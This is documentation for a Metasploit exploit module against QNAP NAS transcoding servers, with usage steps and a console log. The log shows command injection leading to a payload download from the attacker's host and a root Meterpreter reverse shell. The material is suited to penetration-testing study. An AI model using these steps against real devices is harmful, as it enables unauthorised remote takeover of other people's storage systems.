CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/misc/qnap_transcode_server.md
Views: 11788

Description

This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command.

Vulnerable Application

QNAP designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses.

This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727).

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/linux/misc/qnap_transcode_server

  3. Do: set RHOST [IP]

  4. Do: set LHOST [IP]

  5. Do: run

  6. You should get a session

Options

Delay

How long to wait (in seconds) for the device to download the payload.

Scenarios

msf > use exploit/linux/misc/qnap_transcode_server 
msf exploit(qnap_transcode_server) > set rhost 10.1.1.123
rhost => 10.1.1.123
msf exploit(qnap_transcode_server) > check
[*] 10.1.1.123:9251 The target service is running, but could not be validated.
msf exploit(qnap_transcode_server) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf exploit(qnap_transcode_server) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm
[*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm
[*] 10.1.1.123:9251 - Sent command successfully (52 bytes)
[*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)...
[*] 10.1.1.123:9251 - Sent command successfully (22 bytes)
[*] 10.1.1.123:9251 - Sent command successfully (13 bytes)
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400
[*] 10.1.1.123:9251 - Sent command successfully (19 bytes)
[*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes)
[*] 10.1.1.123:9251 - Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 10.1.1.123
OS           :  (Linux 3.2.26)
Architecture : armv7l
Meterpreter  : armle/linux